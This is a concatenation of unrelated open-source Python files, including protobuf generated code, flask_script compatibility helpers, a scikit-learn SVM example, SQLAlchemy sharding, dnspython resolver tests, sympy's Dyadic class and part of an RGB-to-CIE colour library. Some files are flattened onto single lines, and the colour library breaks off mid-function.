@@protoc_insertion_point(class_scope:google.protobuf.EnumValueOptions) class ServiceOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _SERVICEOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.ServiceOptions) class MethodOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _METHODOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.MethodOptions) class UninterpretedOption(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType class NamePart(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _UNINTERPRETEDOPTION_NAMEPART # @@protoc_insertion_point(class_scope:google.protobuf.UninterpretedOption.NamePart) DESCRIPTOR = _UNINTERPRETEDOPTION # @@protoc_insertion_point(class_scope:google.protobuf.UninterpretedOption) # @@protoc_insertion_point(module_scope)
bsd-3-clause
HiroIshikawa/21playground
voting/venv/lib/python3.5/site-packages/flask_script/_compat.py
70
3238
# -*- coding: utf-8 -*- """ flask_script._compat ~~~~~~~~~~~~~~~~~~~~ Some py2/py3 compatibility support based on a stripped down version of six so we don't have to depend on a specific version of it. :copyright: (c) 2013 by Armin Ronacher. :license: BSD, see LICENSE for more details. """ import sys PY2 = sys.version_info[0] == 2 PYPY = hasattr(sys, 'pypy_translation_info') _identity = lambda x: x if not PY2: unichr = chr range_type = range text_type = str string_types = (str, ) integer_types = (int, ) iterkeys = lambda d: iter(d.keys()) itervalues = lambda d: iter(d.values()) iteritems = lambda d: iter(d.items()) import pickle from io import BytesIO, StringIO NativeStringIO = StringIO def reraise(tp, value, tb=None): if value.__traceback__ is not tb: raise value.with_traceback(tb) raise value ifilter = filter imap = map izip = zip intern = sys.intern implements_iterator = _identity implements_to_string = _identity encode_filename = _identity get_next = lambda x: x.__next__ input = input from string import ascii_lowercase else: unichr = unichr text_type = unicode range_type = xrange string_types = (str, unicode) integer_types = (int, long) iterkeys = lambda d: d.iterkeys() itervalues = lambda d: d.itervalues() iteritems = lambda d: d.iteritems() import cPickle as pickle from cStringIO import StringIO as BytesIO, StringIO NativeStringIO = BytesIO exec('def reraise(tp, value, tb=None):\n raise tp, value, tb') from itertools import imap, izip, ifilter intern = intern def implements_iterator(cls): cls.next = cls.__next__ del cls.__next__ return cls def implements_to_string(cls): cls.__unicode__ = cls.__str__ cls.__str__ = lambda x: x.__unicode__().encode('utf-8') return cls get_next = lambda x: x.next def encode_filename(filename): if isinstance(filename, unicode): return filename.encode('utf-8') return filename input = raw_input from string import lower as ascii_lowercase def with_metaclass(meta, *bases): # This requires a bit of explanation: the basic idea is to make 
a # dummy metaclass for one level of class instantiation that replaces # itself with the actual metaclass. Because of internal type checks # we also need to make sure that we downgrade the custom metaclass # for one level to something closer to type (that's why __call__ and # __init__ comes back from type etc.). # # This has the advantage over six.with_metaclass in that it does not # introduce dummy classes into the final MRO. class metaclass(meta): __call__ = type.__call__ __init__ = type.__init__ def __new__(cls, name, this_bases, d): if this_bases is None: return type.__new__(cls, name, (), d) return meta(name, bases, d) return metaclass('temporary_class', None, {}) try: from urllib.parse import quote_from_bytes as url_quote except ImportError: from urllib import quote as url_quote
mit
jaidevd/scikit-learn
examples/svm/plot_svm_nonlinear.py
268
1091
"""
==============
Non-linear SVM
==============

Perform binary classification using non-linear SVC
with RBF kernel. The target to predict is a XOR of the
inputs.

The color map illustrates the decision function learned by the SVC.
"""
print(__doc__)

import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm

# Dense evaluation grid over the [-3, 3] x [-3, 3] square.
xx, yy = np.meshgrid(np.linspace(-3, 3, 500),
                     np.linspace(-3, 3, 500))
np.random.seed(0)
X = np.random.randn(300, 2)
# XOR of the sign of the two features: a classic non-linearly-separable target.
Y = np.logical_xor(X[:, 0] > 0, X[:, 1] > 0)

# fit the model
clf = svm.NuSVC()
clf.fit(X, Y)

# plot the decision function for each datapoint on the grid
Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)

plt.imshow(Z, interpolation='nearest',
           extent=(xx.min(), xx.max(), yy.min(), yy.max()), aspect='auto',
           origin='lower', cmap=plt.cm.PuOr_r)
# BUG FIX: the contour keyword is ``linestyles``; the original passed the
# nonexistent ``linetypes``, so the dashed decision-boundary style was
# never applied (and modern matplotlib rejects unknown kwargs outright).
contours = plt.contour(xx, yy, Z, levels=[0], linewidths=2,
                       linestyles='--')
plt.scatter(X[:, 0], X[:, 1], s=30, c=Y, cmap=plt.cm.Paired)
plt.xticks(())
plt.yticks(())
plt.axis([-3, 3, -3, 3])
plt.show()
bsd-3-clause
maftieu/CouchPotatoServer
libs/sqlalchemy/ext/horizontal_shard.py
18
4953
# ext/horizontal_shard.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php

"""Horizontal sharding support.

Defines a rudimental 'horizontal sharding' system which allows a Session to
distribute queries and persistence operations across multiple databases.

For a usage example, see the :ref:`examples_sharding` example included in
the source distribution.

"""

from sqlalchemy import exc as sa_exc
from sqlalchemy import util
from sqlalchemy.orm.session import Session
from sqlalchemy.orm.query import Query

__all__ = ['ShardedSession', 'ShardedQuery']


class ShardedQuery(Query):
    """A :class:`Query` that routes execution across the shards chosen by
    its owning :class:`ShardedSession`'s chooser callables."""

    def __init__(self, *args, **kwargs):
        super(ShardedQuery, self).__init__(*args, **kwargs)
        # Chooser callables are borrowed from the owning ShardedSession.
        self.id_chooser = self.session.id_chooser
        self.query_chooser = self.session.query_chooser
        # None means "fan out over all shards query_chooser returns".
        self._shard_id = None

    def set_shard(self, shard_id):
        """return a new query, limited to a single shard ID.

        all subsequent operations with the returned query will
        be against the single shard regardless of other state.
        """

        q = self._clone()
        q._shard_id = shard_id
        return q

    def _execute_and_instances(self, context):
        # Execute the statement against one shard and yield ORM instances.
        def iter_for_shard(shard_id):
            # Stash the shard id so connection resolution downstream sees it.
            context.attributes['shard_id'] = shard_id
            result = self._connection_from_session(
                            mapper=self._mapper_zero(),
                            shard_id=shard_id).execute(
                                    context.statement,
                                    self._params)
            return self.instances(result, context)

        if self._shard_id is not None:
            # Pinned to one shard via set_shard(): single execution.
            return iter_for_shard(self._shard_id)
        else:
            # Fan out to every shard the query_chooser nominates and
            # concatenate the results in chooser order.
            partial = []
            for shard_id in self.query_chooser(self):
                partial.extend(iter_for_shard(shard_id))

            # if some kind of in memory 'sorting'
            # were done, this is where it would happen
            return iter(partial)

    def get(self, ident, **kwargs):
        """Identity-map get; probes candidate shards from id_chooser in
        order and returns the first hit, or None."""
        if self._shard_id is not None:
            return super(ShardedQuery, self).get(ident)
        else:
            ident = util.to_list(ident)
            for shard_id in self.id_chooser(self, ident):
                o = self.set_shard(shard_id).get(ident, **kwargs)
                if o is not None:
                    return o
            else:
                # for/else: no shard produced the object.
                return None


class ShardedSession(Session):
    """A :class:`Session` that maintains a bind per shard id and routes
    connections through user-supplied chooser callables."""

    def __init__(self, shard_chooser, id_chooser, query_chooser, shards=None,
                query_cls=ShardedQuery, **kwargs):
        """Construct a ShardedSession.

        :param shard_chooser: A callable which, passed a Mapper, a mapped
          instance, and possibly a SQL clause, returns a shard ID.  This id
          may be based off of the attributes present within the object, or
          on some round-robin scheme. If the scheme is based on a selection,
          it should set whatever state on the instance to mark it in the
          future as participating in that shard.

        :param id_chooser: A callable, passed a query and a tuple of identity
          values, which should return a list of shard ids where the ID might
          reside.  The databases will be queried in the order of this listing.

        :param query_chooser: For a given Query, returns the list of shard_ids
          where the query should be issued.  Results from all shards returned
          will be combined together into a single listing.

        :param shards: A dictionary of string shard names
          to :class:`~sqlalchemy.engine.base.Engine` objects.

        """
        super(ShardedSession, self).__init__(query_cls=query_cls, **kwargs)
        self.shard_chooser = shard_chooser
        self.id_chooser = id_chooser
        self.query_chooser = query_chooser
        # shard_id -> bind (Engine/Connection); populated via bind_shard().
        self.__binds = {}
        # Session internals call connection_callable for per-flush connections;
        # point it at our shard-aware connection() method.
        self.connection_callable = self.connection
        if shards is not None:
            for k in shards:
                self.bind_shard(k, shards[k])

    def connection(self, mapper=None, instance=None, shard_id=None, **kwargs):
        """Return a connection for the given shard, resolving the shard id
        via shard_chooser when not given explicitly."""
        if shard_id is None:
            shard_id = self.shard_chooser(mapper, instance)

        if self.transaction is not None:
            # Inside a transaction: reuse its per-shard connection.
            return self.transaction.connection(mapper, shard_id=shard_id)
        else:
            return self.get_bind(mapper,
                                shard_id=shard_id,
                                instance=instance).contextual_connect(**kwargs)

    def get_bind(self, mapper, shard_id=None, instance=None, clause=None, **kw):
        """Return the bind registered for *shard_id* (chosen via
        shard_chooser when not supplied).  Raises KeyError for unknown ids."""
        if shard_id is None:
            shard_id = self.shard_chooser(mapper, instance, clause=clause)
        return self.__binds[shard_id]

    def bind_shard(self, shard_id, bind):
        """Register (or replace) the bind for *shard_id*."""
        self.__binds[shard_id] = bind
gpl-3.0
mollstam/UnrealPy
UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/dnspython-1.12.0/tests/test_resolver.py
12
6753
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc. # # Permission to use, copy, modify, and distribute this software and its # documentation for any purpose with or without fee is hereby granted, # provided that the above copyright notice and this permission notice # appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT # OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. import cStringIO import select import sys import time import unittest import dns.name import dns.message import dns.name import dns.rdataclass import dns.rdatatype import dns.resolver resolv_conf = """ /t/t # comment 1 ; comment 2 domain foo nameserver 10.0.0.1 nameserver 10.0.0.2 """ message_text = """id 1234 opcode QUERY rcode NOERROR flags QR AA RD ;QUESTION example. IN A ;ANSWER example. 
1 IN A 10.0.0.1 ;AUTHORITY ;ADDITIONAL """ class FakeAnswer(object): def __init__(self, expiration): self.expiration = expiration class BaseResolverTests(object): if sys.platform != 'win32': def testRead(self): f = cStringIO.StringIO(resolv_conf) r = dns.resolver.Resolver(f) self.failUnless(r.nameservers == ['10.0.0.1', '10.0.0.2'] and r.domain == dns.name.from_text('foo')) def testCacheExpiration(self): message = dns.message.from_text(message_text) name = dns.name.from_text('example.') answer = dns.resolver.Answer(name, dns.rdatatype.A, dns.rdataclass.IN, message) cache = dns.resolver.Cache() cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) time.sleep(2) self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) def testCacheCleaning(self): message = dns.message.from_text(message_text) name = dns.name.from_text('example.') answer = dns.resolver.Answer(name, dns.rdatatype.A, dns.rdataclass.IN, message) cache = dns.resolver.Cache(cleaning_interval=1.0) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) time.sleep(2) self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) def testZoneForName1(self): name = dns.name.from_text('www.dnspython.org.') ezname = dns.name.from_text('dnspython.org.') zname = dns.resolver.zone_for_name(name) self.failUnless(zname == ezname) def testZoneForName2(self): name = dns.name.from_text('a.b.www.dnspython.org.') ezname = dns.name.from_text('dnspython.org.') zname = dns.resolver.zone_for_name(name) self.failUnless(zname == ezname) def testZoneForName3(self): name = dns.name.from_text('dnspython.org.') ezname = dns.name.from_text('dnspython.org.') zname = dns.resolver.zone_for_name(name) self.failUnless(zname == ezname) def testZoneForName4(self): def bad(): name = dns.name.from_text('dnspython.org', None) zname = dns.resolver.zone_for_name(name) self.failUnlessRaises(dns.resolver.NotAbsolute, bad) def testLRUReplace(self): cache = dns.resolver.LRUCache(4) for i in 
xrange(0, 5): name = dns.name.from_text('example%d.' % i) answer = FakeAnswer(time.time() + 1) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) for i in xrange(0, 5): name = dns.name.from_text('example%d.' % i) if i == 0: self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) else: self.failUnless(not cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) def testLRUDoesLRU(self): cache = dns.resolver.LRUCache(4) for i in xrange(0, 4): name = dns.name.from_text('example%d.' % i) answer = FakeAnswer(time.time() + 1) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) name = dns.name.from_text('example0.') cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) # The LRU is now example1. name = dns.name.from_text('example4.') answer = FakeAnswer(time.time() + 1) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) for i in xrange(0, 5): name = dns.name.from_text('example%d.' % i) if i == 1: self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) else: self.failUnless(not cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) def testLRUExpiration(self): cache = dns.resolver.LRUCache(4) for i in xrange(0, 4): name = dns.name.from_text('example%d.' % i) answer = FakeAnswer(time.time() + 1) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) time.sleep(2) for i in xrange(0, 4): name = dns.name.from_text('example%d.' 
% i) self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) class PollingMonkeyPatchMixin(object): def setUp(self): self.__native_polling_backend = dns.query._polling_backend dns.query._set_polling_backend(self.polling_backend()) unittest.TestCase.setUp(self) def tearDown(self): dns.query._set_polling_backend(self.__native_polling_backend) unittest.TestCase.tearDown(self) class SelectResolverTestCase(PollingMonkeyPatchMixin, BaseResolverTests, unittest.TestCase): def polling_backend(self): return dns.query._select_for if hasattr(select, 'poll'): class PollResolverTestCase(PollingMonkeyPatchMixin, BaseResolverTests, unittest.TestCase): def polling_backend(self): return dns.query._poll_for if __name__ == '__main__': unittest.main()
mit
MechCoder/sympy
sympy/physics/vector/dyadic.py
54
18024
from sympy import sympify, Add, ImmutableMatrix as Matrix from sympy.core.compatibility import u, unicode from .printing import (VectorLatexPrinter, VectorPrettyPrinter, VectorStrPrinter) __all__ = ['Dyadic'] class Dyadic(object): """A Dyadic object. See: http://en.wikipedia.org/wiki/Dyadic_tensor Kane, T., Levinson, D. Dynamics Theory and Applications. 1985 McGraw-Hill A more powerful way to represent a rigid body's inertia. While it is more complex, by choosing Dyadic components to be in body fixed basis vectors, the resulting matrix is equivalent to the inertia tensor. """ def __init__(self, inlist): """ Just like Vector's init, you shouldn't call this unless creating a zero dyadic. zd = Dyadic(0) Stores a Dyadic as a list of lists; the inner list has the measure number and the two unit vectors; the outerlist holds each unique unit vector pair. """ self.args = [] if inlist == 0: inlist = [] while len(inlist) != 0: added = 0 for i, v in enumerate(self.args): if ((str(inlist[0][1]) == str(self.args[i][1])) and (str(inlist[0][2]) == str(self.args[i][2]))): self.args[i] = (self.args[i][0] + inlist[0][0], inlist[0][1], inlist[0][2]) inlist.remove(inlist[0]) added = 1 break if added != 1: self.args.append(inlist[0]) inlist.remove(inlist[0]) i = 0 # This code is to remove empty parts from the list while i < len(self.args): if ((self.args[i][0] == 0) | (self.args[i][1] == 0) | (self.args[i][2] == 0)): self.args.remove(self.args[i]) i -= 1 i += 1 def __add__(self, other): """The add operator for Dyadic. """ other = _check_dyadic(other) return Dyadic(self.args + other.args) def __and__(self, other): """The inner product operator for a Dyadic and a Dyadic or Vector. 
Parameters ========== other : Dyadic or Vector The other Dyadic or Vector to take the inner product with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer >>> N = ReferenceFrame('N') >>> D1 = outer(N.x, N.y) >>> D2 = outer(N.y, N.y) >>> D1.dot(D2) (N.x|N.y) >>> D1.dot(N.y) N.x """ from sympy.physics.vector.vector import Vector, _check_vector if isinstance(other, Dyadic): other = _check_dyadic(other) ol = Dyadic(0) for i, v in enumerate(self.args): for i2, v2 in enumerate(other.args): ol += v[0] * v2[0] * (v[2] & v2[1]) * (v[1] | v2[2]) else: other = _check_vector(other) ol = Vector(0) for i, v in enumerate(self.args): ol += v[0] * v[1] * (v[2] & other) return ol def __div__(self, other): """Divides the Dyadic by a sympifyable expression. """ return self.__mul__(1 / other) __truediv__ = __div__ def __eq__(self, other): """Tests for equality. Is currently weak; needs stronger comparison testing """ if other == 0: other = Dyadic(0) other = _check_dyadic(other) if (self.args == []) and (other.args == []): return True elif (self.args == []) or (other.args == []): return False return set(self.args) == set(other.args) def __mul__(self, other): """Multiplies the Dyadic by a sympifyable expression. 
Parameters ========== other : Sympafiable The scalar to multiply this Dyadic with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer >>> N = ReferenceFrame('N') >>> d = outer(N.x, N.x) >>> 5 * d 5*(N.x|N.x) """ newlist = [v for v in self.args] for i, v in enumerate(newlist): newlist[i] = (sympify(other) * newlist[i][0], newlist[i][1], newlist[i][2]) return Dyadic(newlist) def __ne__(self, other): return not self.__eq__(other) def __neg__(self): return self * -1 def _latex(self, printer=None): ar = self.args # just to shorten things if len(ar) == 0: return str(0) ol = [] # output list, to be concatenated to a string mlp = VectorLatexPrinter() for i, v in enumerate(ar): # if the coef of the dyadic is 1, we skip the 1 if ar[i][0] == 1: ol.append(' + ' + mlp.doprint(ar[i][1]) + r"\otimes " + mlp.doprint(ar[i][2])) # if the coef of the dyadic is -1, we skip the 1 elif ar[i][0] == -1: ol.append(' - ' + mlp.doprint(ar[i][1]) + r"\otimes " + mlp.doprint(ar[i][2])) # If the coefficient of the dyadic is not 1 or -1, # we might wrap it in parentheses, for readability. 
elif ar[i][0] != 0: arg_str = mlp.doprint(ar[i][0]) if isinstance(ar[i][0], Add): arg_str = '(%s)' % arg_str if arg_str.startswith('-'): arg_str = arg_str[1:] str_start = ' - ' else: str_start = ' + ' ol.append(str_start + arg_str + mlp.doprint(ar[i][1]) + r"\otimes " + mlp.doprint(ar[i][2])) outstr = ''.join(ol) if outstr.startswith(' + '): outstr = outstr[3:] elif outstr.startswith(' '): outstr = outstr[1:] return outstr def _pretty(self, printer=None): e = self class Fake(object): baseline = 0 def render(self, *args, **kwargs): ar = e.args # just to shorten things settings = printer._settings if printer else {} if printer: use_unicode = printer._use_unicode else: from sympy.printing.pretty.pretty_symbology import ( pretty_use_unicode) use_unicode = pretty_use_unicode() mpp = printer if printer else VectorPrettyPrinter(settings) if len(ar) == 0: return unicode(0) bar = u("\N{CIRCLED TIMES}") if use_unicode else "|" ol = [] # output list, to be concatenated to a string for i, v in enumerate(ar): # if the coef of the dyadic is 1, we skip the 1 if ar[i][0] == 1: ol.extend([u(" + "), mpp.doprint(ar[i][1]), bar, mpp.doprint(ar[i][2])]) # if the coef of the dyadic is -1, we skip the 1 elif ar[i][0] == -1: ol.extend([u(" - "), mpp.doprint(ar[i][1]), bar, mpp.doprint(ar[i][2])]) # If the coefficient of the dyadic is not 1 or -1, # we might wrap it in parentheses, for readability. 
elif ar[i][0] != 0: if isinstance(ar[i][0], Add): arg_str = mpp._print( ar[i][0]).parens()[0] else: arg_str = mpp.doprint(ar[i][0]) if arg_str.startswith(u("-")): arg_str = arg_str[1:] str_start = u(" - ") else: str_start = u(" + ") ol.extend([str_start, arg_str, u(" "), mpp.doprint(ar[i][1]), bar, mpp.doprint(ar[i][2])]) outstr = u("").join(ol) if outstr.startswith(u(" + ")): outstr = outstr[3:] elif outstr.startswith(" "): outstr = outstr[1:] return outstr return Fake() def __rand__(self, other): """The inner product operator for a Vector or Dyadic, and a Dyadic This is for: Vector dot Dyadic Parameters ========== other : Vector The vector we are dotting with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, dot, outer >>> N = ReferenceFrame('N') >>> d = outer(N.x, N.x) >>> dot(N.x, d) N.x """ from sympy.physics.vector.vector import Vector, _check_vector other = _check_vector(other) ol = Vector(0) for i, v in enumerate(self.args): ol += v[0] * v[2] * (v[1] & other) return ol def __rsub__(self, other): return (-1 * self) + other def __rxor__(self, other): """For a cross product in the form: Vector x Dyadic Parameters ========== other : Vector The Vector that we are crossing this Dyadic with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer, cross >>> N = ReferenceFrame('N') >>> d = outer(N.x, N.x) >>> cross(N.y, d) - (N.z|N.x) """ from sympy.physics.vector.vector import _check_vector other = _check_vector(other) ol = Dyadic(0) for i, v in enumerate(self.args): ol += v[0] * ((other ^ v[1]) | v[2]) return ol def __str__(self, printer=None): """Printing method. 
""" ar = self.args # just to shorten things if len(ar) == 0: return str(0) ol = [] # output list, to be concatenated to a string for i, v in enumerate(ar): # if the coef of the dyadic is 1, we skip the 1 if ar[i][0] == 1: ol.append(' + (' + str(ar[i][1]) + '|' + str(ar[i][2]) + ')') # if the coef of the dyadic is -1, we skip the 1 elif ar[i][0] == -1: ol.append(' - (' + str(ar[i][1]) + '|' + str(ar[i][2]) + ')') # If the coefficient of the dyadic is not 1 or -1, # we might wrap it in parentheses, for readability. elif ar[i][0] != 0: arg_str = VectorStrPrinter().doprint(ar[i][0]) if isinstance(ar[i][0], Add): arg_str = "(%s)" % arg_str if arg_str[0] == '-': arg_str = arg_str[1:] str_start = ' - ' else: str_start = ' + ' ol.append(str_start + arg_str + '*(' + str(ar[i][1]) + '|' + str(ar[i][2]) + ')') outstr = ''.join(ol) if outstr.startswith(' + '): outstr = outstr[3:] elif outstr.startswith(' '): outstr = outstr[1:] return outstr def __sub__(self, other): """The subtraction operator. """ return self.__add__(other * -1) def __xor__(self, other): """For a cross product in the form: Dyadic x Vector. Parameters ========== other : Vector The Vector that we are crossing this Dyadic with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer, cross >>> N = ReferenceFrame('N') >>> d = outer(N.x, N.x) >>> cross(d, N.y) (N.x|N.z) """ from sympy.physics.vector.vector import _check_vector other = _check_vector(other) ol = Dyadic(0) for i, v in enumerate(self.args): ol += v[0] * (v[1] | (v[2] ^ other)) return ol _sympystr = __str__ _sympyrepr = _sympystr __repr__ = __str__ __radd__ = __add__ __rmul__ = __mul__ def express(self, frame1, frame2=None): """Expresses this Dyadic in alternate frame(s) The first frame is the list side expression, the second frame is the right side; if Dyadic is in form A.x|B.y, you can express it in two different frames. If no second frame is given, the Dyadic is expressed in only one frame. 
Calls the global express function Parameters ========== frame1 : ReferenceFrame The frame to express the left side of the Dyadic in frame2 : ReferenceFrame If provided, the frame to express the right side of the Dyadic in Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer, dynamicsymbols >>> N = ReferenceFrame('N') >>> q = dynamicsymbols('q') >>> B = N.orientnew('B', 'Axis', [q, N.z]) >>> d = outer(N.x, N.x) >>> d.express(B, N) cos(q)*(B.x|N.x) - sin(q)*(B.y|N.x) """ from sympy.physics.vector.functions import express return express(self, frame1, frame2) def to_matrix(self, reference_frame, second_reference_frame=None): """Returns the matrix form of the dyadic with respect to one or two reference frames. Parameters ---------- reference_frame : ReferenceFrame The reference frame that the rows and columns of the matrix correspond to. If a second reference frame is provided, this only corresponds to the rows of the matrix. second_reference_frame : ReferenceFrame, optional, default=None The reference frame that the columns of the matrix correspond to. Returns ------- matrix : ImmutableMatrix, shape(3,3) The matrix that gives the 2D tensor form. 
Examples ======== >>> from sympy import symbols >>> from sympy.physics.vector import ReferenceFrame, Vector >>> Vector.simp = True >>> from sympy.physics.mechanics import inertia >>> Ixx, Iyy, Izz, Ixy, Iyz, Ixz = symbols('Ixx, Iyy, Izz, Ixy, Iyz, Ixz') >>> N = ReferenceFrame('N') >>> inertia_dyadic = inertia(N, Ixx, Iyy, Izz, Ixy, Iyz, Ixz) >>> inertia_dyadic.to_matrix(N) Matrix([ [Ixx, Ixy, Ixz], [Ixy, Iyy, Iyz], [Ixz, Iyz, Izz]]) >>> beta = symbols('beta') >>> A = N.orientnew('A', 'Axis', (beta, N.x)) >>> inertia_dyadic.to_matrix(A) Matrix([ [ Ixx, Ixy*cos(beta) + Ixz*sin(beta), -Ixy*sin(beta) + Ixz*cos(beta)], [ Ixy*cos(beta) + Ixz*sin(beta), Iyy*cos(2*beta)/2 + Iyy/2 + Iyz*sin(2*beta) - Izz*cos(2*beta)/2 + Izz/2, -Iyy*sin(2*beta)/2 + Iyz*cos(2*beta) + Izz*sin(2*beta)/2], [-Ixy*sin(beta) + Ixz*cos(beta), -Iyy*sin(2*beta)/2 + Iyz*cos(2*beta) + Izz*sin(2*beta)/2, -Iyy*cos(2*beta)/2 + Iyy/2 - Iyz*sin(2*beta) + Izz*cos(2*beta)/2 + Izz/2]]) """ if second_reference_frame is None: second_reference_frame = reference_frame return Matrix([i.dot(self).dot(j) for i in reference_frame for j in second_reference_frame]).reshape(3, 3) def doit(self, **hints): """Calls .doit() on each term in the Dyadic""" return sum([Dyadic([(v[0].doit(**hints), v[1], v[2])]) for v in self.args], Dyadic(0)) def dt(self, frame): """Take the time derivative of this Dyadic in a frame. 
This function calls the global time_derivative method Parameters ========== frame : ReferenceFrame The frame to take the time derivative in Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer, dynamicsymbols >>> N = ReferenceFrame('N') >>> q = dynamicsymbols('q') >>> B = N.orientnew('B', 'Axis', [q, N.z]) >>> d = outer(N.x, N.x) >>> d.dt(B) - q'*(N.y|N.x) - q'*(N.x|N.y) """ from sympy.physics.vector.functions import time_derivative return time_derivative(self, frame) def simplify(self): """Returns a simplified Dyadic.""" out = Dyadic(0) for v in self.args: out += Dyadic([(v[0].simplify(), v[1], v[2])]) return out def subs(self, *args, **kwargs): """Substituion on the Dyadic. Examples ======== >>> from sympy.physics.vector import ReferenceFrame >>> from sympy import Symbol >>> N = ReferenceFrame('N') >>> s = Symbol('s') >>> a = s * (N.x|N.x) >>> a.subs({s: 2}) 2*(N.x|N.x) """ return sum([Dyadic([(v[0].subs(*args, **kwargs), v[1], v[2])]) for v in self.args], Dyadic(0)) def applyfunc(self, f): """Apply a function to each component of a Dyadic.""" if not callable(f): raise TypeError("`f` must be callable.") out = Dyadic(0) for a, b, c in self.args: out += f(a) * (b|c) return out dot = __and__ cross = __xor__ def _check_dyadic(other): if not isinstance(other, Dyadic): raise TypeError('A Dyadic must be supplied') return other
bsd-3-clause
oflisback/leaphue
rgb_cie.py
7
8148
"""
Library for RGB / CIE1931 coversion.
Ported and extended from Bryan Johnson's JavaScript implementation:
https://github.com/bjohnso5/hue-hacking

Copyright (c) 2014 Benjamin Knight / MIT License.
"""
import math
import random
from collections import namedtuple

# Represents a CIE 1931 XY coordinate pair.
XYPoint = namedtuple('XYPoint', ['x', 'y'])


class ColorHelper:
    """Low-level RGB <-> CIE 1931 math, constrained to the Hue lamp gamut."""

    # Corners of the CIE 1931 chromaticity triangle a Hue lamp can reproduce.
    Red = XYPoint(0.675, 0.322)
    Lime = XYPoint(0.4091, 0.518)
    Blue = XYPoint(0.167, 0.04)

    def hexToRed(self, hex):
        """Parses a valid hex color string and returns the Red RGB integer value."""
        return int(hex[0:2], 16)

    def hexToGreen(self, hex):
        """Parses a valid hex color string and returns the Green RGB integer value."""
        return int(hex[2:4], 16)

    def hexToBlue(self, hex):
        """Parses a valid hex color string and returns the Blue RGB integer value."""
        return int(hex[4:6], 16)

    def hexToRGB(self, h):
        """Converts a valid hex color string to an RGB array [r, g, b] of 0..255 ints."""
        rgb = [self.hexToRed(h), self.hexToGreen(h), self.hexToBlue(h)]
        return rgb

    def rgbToHex(self, r, g, b):
        """Converts RGB (0..255 ints) to a 6-character lowercase hex string."""
        return '%02x%02x%02x' % (r, g, b)

    def randomRGBValue(self):
        """Return a random Integer in the range of 0 to 255, representing an RGB
        color value."""
        return random.randrange(0, 256)

    def crossProduct(self, p1, p2):
        """Returns the (scalar z-component of the) cross product of two XYPoints."""
        return (p1.x * p2.y - p1.y * p2.x)

    def checkPointInLampsReach(self, p):
        """Check if the provided XYPoint lies inside the gamut triangle
        (barycentric test against Red/Lime/Blue)."""
        v1 = XYPoint(self.Lime.x - self.Red.x, self.Lime.y - self.Red.y)
        v2 = XYPoint(self.Blue.x - self.Red.x, self.Blue.y - self.Red.y)
        q = XYPoint(p.x - self.Red.x, p.y - self.Red.y)

        s = self.crossProduct(q, v2) / self.crossProduct(v1, v2)
        t = self.crossProduct(v1, q) / self.crossProduct(v1, v2)

        # Inside iff both barycentric weights are non-negative and sum <= 1.
        return (s >= 0.0) and (t >= 0.0) and (s + t <= 1.0)

    def getClosestPointToLine(self, A, B, P):
        """Find the closest point to P on the segment A-B.
        This point will be reproducible by a Hue lamp."""
        AP = XYPoint(P.x - A.x, P.y - A.y)
        AB = XYPoint(B.x - A.x, B.y - A.y)
        ab2 = AB.x * AB.x + AB.y * AB.y
        ap_ab = AP.x * AB.x + AP.y * AB.y
        t = ap_ab / ab2

        # Clamp the projection parameter so the answer stays on the segment.
        if t < 0.0:
            t = 0.0
        elif t > 1.0:
            t = 1.0

        return XYPoint(A.x + AB.x * t, A.y + AB.y * t)

    def getClosestPointToPoint(self, xyPoint):
        """Project an out-of-gamut point onto the nearest triangle edge."""
        # Color is unreproducible, find the closest point on each line in the
        # CIE 1931 'triangle'.
        pAB = self.getClosestPointToLine(self.Red, self.Lime, xyPoint)
        pAC = self.getClosestPointToLine(self.Blue, self.Red, xyPoint)
        pBC = self.getClosestPointToLine(self.Lime, self.Blue, xyPoint)

        # Get the distances per point and see which point is closer to our Point.
